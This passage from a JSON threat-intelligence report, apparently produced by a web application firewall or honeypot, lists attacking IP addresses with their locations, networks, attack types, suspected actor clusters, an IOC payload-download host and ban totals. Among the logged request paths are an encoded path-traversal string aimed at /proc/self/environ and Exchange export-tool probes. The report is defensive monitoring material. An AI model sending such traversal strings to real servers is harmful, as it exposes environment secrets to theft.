   "cc": "US",
   "city": "Phoenix",
   "lat": 33.4483,
   "lon": -112.073,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-04T18:01:00+02:00",
   "last_seen": "2026-10-04T18:01:00+02:00",
   "sensors": [
    "web-2"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [
    "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  },
  {
   "ip": "20.51.250.231",
   "country": "United States",
   "cc": "US",
   "city": "Dulles",
   "lat": 38.9639,
   "lon": -77.4496,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-04T18:54:00+02:00",
   "last_seen": "2026-10-04T18:54:00+02:00",
   "sensors": [
    "web-1"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "34.81.122.81",
   "country": "Taiwan",
   "cc": "TW",
   "city": "Taoyuan",
   "lat": 25.0797,
   "lon": 121.234,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "81.122.81.34.bc.googleusercontent.com",
   "types": [
    "path-traversal"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-04T22:27:00+02:00",
   "last_seen": "2026-10-04T22:27:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/[@]fs/..%252f..%252f..%252f..%252f..%252fproc/self/environ?raw??"
   ],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "35.205.88.64",
   "country": "Belgium",
   "cc": "BE",
   "city": "Brussels",
   "lat": 50.8476,
   "lon": 4.35717,
   "asn": 396982,
   "org": "Google LLC",
   "ptr": "64.88.205.35.bc.googleusercontent.com",
   "types": [
    "behaviour"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-04T23:37:00+02:00",
   "last_seen": "2026-10-04T23:37:00+02:00",
   "sensors": [
    "edge"
   ],
   "notes": [],
   "tags": [
    "hosting-provider"
   ],
   "paths": [
    "/config.json"
   ],
   "actor": {
    "label": "Unattributed automated probe",
    "confidence": "low",
    "evidence": []
   },
   "seen_nights": [
    "2026-10-05"
   ]
  },
  {
   "ip": "40.124.186.184",
   "country": "United States",
   "cc": "US",
   "city": "San Antonio",
   "lat": 29.4252,
   "lon": -98.4946,
   "asn": 8075,
   "org": "Microsoft Corporation",
   "ptr": null,
   "types": [
    "attack-tool"
   ],
   "bans": 0,
   "max_offence": 0,
   "ban_state": "not banned",
   "requests_known": null,
   "first_seen": "2026-10-04T18:04:00+02:00",
   "last_seen": "2026-10-04T18:04:00+02:00",
   "sensors": [
    "web-3"
   ],
   "notes": [],
   "tags": [
    "hosting-provider",
    "multi-night"
   ],
   "paths": [
    "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"
   ],
   "actor": {
    "label": "Automated attack tool",
    "confidence": "low",
    "evidence": [
     "request carried a known attack-tool user agent"
    ]
   },
   "seen_nights": [
    "2026-10-05",
    "2026-10-06"
   ]
  }
 ],
 "iocs": [
  {
   "indicator": "175.148.158.44",
   "port": null,
   "kind": "payload-download-host",
   "context": "Shell command injection payload fetches /",
   "seen_from": "175.148.158.44"
  }
 ],
 "actors": [
  {
   "label": "Suspected credential/secret-harvesting campaign",
   "confidence": "medium",
   "addresses": 61,
   "ips": [
    "45.138.12.28",
    "34.140.132.132",
    "45.138.12.22",
    "87.120.104.29",
    "34.62.82.165",
    "34.156.22.151",
    "34.187.18.72",
    "34.47.17.196",
    "104.244.74.39",
    "81.171.74.60",
    "216.81.200.21",
    "34.16.151.47",
    "34.182.177.246",
    "34.50.26.28",
    "104.211.91.50",
    "136.85.99.221",
    "167.99.249.21",
    "178.128.151.198",
    "193.47.62.168",
    "195.178.110.159",
    "195.178.110.199",
    "20.204.16.15",
    "20.249.5.100",
    "216.126.237.47",
    "34.14.216.183",
    "34.140.234.80",
    "34.142.253.246",
    "34.176.225.3",
    "34.18.32.39",
    "34.186.110.67",
    "34.22.106.197",
    "34.22.117.21",
    "34.31.206.252",
    "34.32.83.153",
    "34.34.217.140",
    "34.39.67.13",
    "34.64.237.210",
    "34.65.72.219",
    "34.75.105.13",
    "34.77.137.207",
    "35.222.122.52",
    "35.225.33.58",
    "35.234.7.208",
    "45.138.12.16",
    "45.138.12.26",
    "45.138.12.51",
    "45.138.12.9",
    "45.148.10.5",
    "45.153.102.164",
    "45.156.87.131",
    "46.151.182.93",
    "8.234.127.199",
    "81.171.72.135",
    "81.171.72.93",
    "91.148.244.131",
    "91.148.245.81",
    "93.123.109.101",
    "94.154.43.135",
    "94.154.43.146",
    "95.168.180.75",
    "95.173.222.8"
   ],
   "top_countries": {
    "US": 10,
    "NL": 7,
    "HK": 6,
    "BE": 6,
    "AD": 5
   },
   "types": {
    "secret-probe": 53,
    "credential-probe": 11,
    "php-probe": 2
   },
   "evidence": [
    "hunts for .env, VCS or credential files",
    "listed on Spamhaus DROP",
    "listed on FireHOL level 1",
    "AS218785 TC DATACENTER (abuse-prone hosting)",
    "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night",
    "AS48090 TECHOFF SRV (abuse-prone hosting)"
   ]
  },
  {
   "label": "Suspected exploit/RCE bot",
   "confidence": "low",
   "addresses": 18,
   "ips": [
    "81.0.221.48",
    "34.100.153.150",
    "49.0.202.115",
    "223.83.183.254",
    "45.238.235.2",
    "101.42.0.42",
    "103.46.186.148",
    "124.158.13.141",
    "144.225.6.184",
    "154.217.245.253",
    "184.154.245.42",
    "186.182.105.49",
    "192.3.245.183",
    "196.189.236.67",
    "2.56.172.206",
    "221.159.119.6",
    "66.218.236.8",
    "71.70.231.156"
   ],
   "top_countries": {
    "US": 6,
    "CN": 2,
    "GB": 1,
    "IN": 1,
    "SG": 1
   },
   "types": {
    "rce-payload": 17,
    "command-injection": 1
   },
   "evidence": [
    "sent a shell or PHP payload"
   ]
  },
  {
   "label": "Internet research scanner (benign)",
   "confidence": "high",
   "addresses": 7,
   "ips": [
    "146.190.103.103",
    "184.105.247.195",
    "184.105.247.252",
    "185.226.197.69",
    "206.189.233.36",
    "64.62.156.172",
    "65.49.1.142"
   ],
   "top_countries": {
    "US": 5,
    "SG": 1,
    "NL": 1
   },
   "types": {
    "secret-probe": 6,
    "cms-probe": 1
   },
   "evidence": [
    "reverse DNS d3ecc9518c.scan.leakix.org",
    "reverse DNS scan-14.shadowserver.io",
    "reverse DNS scan-21b.shadowserver.io",
    "reverse DNS zl-amsc-nl-gp6-wk117c.internet-census.org",
    "reverse DNS a957d52272.scan.leakix.org",
    "reverse DNS scan-85-0.shadowserver.io"
   ]
  },
  {
   "label": "Suspected Mirai-style IoT botnet",
   "confidence": "medium",
   "addresses": 5,
   "ips": [
    "45.78.224.87",
    "168.228.151.152",
    "175.148.158.44",
    "187.87.144.234",
    "89.126.211.166"
   ],
   "top_countries": {
    "BR": 2,
    "SG": 1,
    "CN": 1,
    "UZ": 1
   },
   "types": {
    "rce-payload": 4,
    "command-injection": 1
   },
   "evidence": [
    "IoT/router exploit path with a downloader typical of Mirai-family loaders"
   ]
  },
  {
   "label": "Unattributed automated probe",
   "confidence": "low",
   "addresses": 4,
   "ips": [
    "34.47.27.5",
    "34.53.212.113",
    "34.81.122.81",
    "35.205.88.64"
   ],
   "top_countries": {
    "BE": 2,
    "CA": 1,
    "TW": 1
   },
   "types": {
    "path-traversal": 1,
    "behaviour": 1
   },
   "evidence": []
  },
  {
   "label": "Suspected CMS exploitation bot",
   "confidence": "low",
   "addresses": 4,
   "ips": [
    "178.211.139.240",
    "187.17.228.218",
    "20.210.186.186",
    "85.204.70.112"
   ],
   "top_countries": {
    "PL": 1,
    "BR": 1,
    "JP": 1,
    "FR": 1
   },
   "types": {
    "php-probe": 3,
    "cms-probe": 1
   },
   "evidence": [
    "CMS, admin panel or PHP script probing"
   ]
  },
  {
   "label": "Automated attack tool",
   "confidence": "low",
   "addresses": 4,
   "ips": [
    "187.108.1.142",
    "134.33.66.210",
    "20.51.250.231",
    "40.124.186.184"
   ],
   "top_countries": {
    "US": 3,
    "BR": 1
   },
   "types": {
    "attack-tool": 4
   },
   "evidence": [
    "request carried a known attack-tool user agent"
   ]
  },
  {
   "label": "Known-bad scanning infrastructure",
   "confidence": "medium",
   "addresses": 3,
   "ips": [
    "45.138.12.43",
    "185.19.40.244",
    "209.99.187.10"
   ],
   "top_countries": {
    "HK": 1,
    "DE": 1,
    "US": 1
   },
   "types": {
    "cms-probe": 2,
    "rce-payload": 1
   },
   "evidence": [
    "listed on Spamhaus DROP",
    "listed on FireHOL level 1",
    "AS218785 TC DATACENTER (abuse-prone hosting)",
    "7 addresses from 45.138.12.0/24 (AS218785) attacked the same night"
   ]
  }
 ],
 "banned_identifiers": {
  "ip_addresses": 98,
  "ban_actions": 115,
  "email_addresses": 0,
  "other": 0,
  "note": "The WAF bans network addresses only; no e-mail or account identifiers appear in the source."
 }
}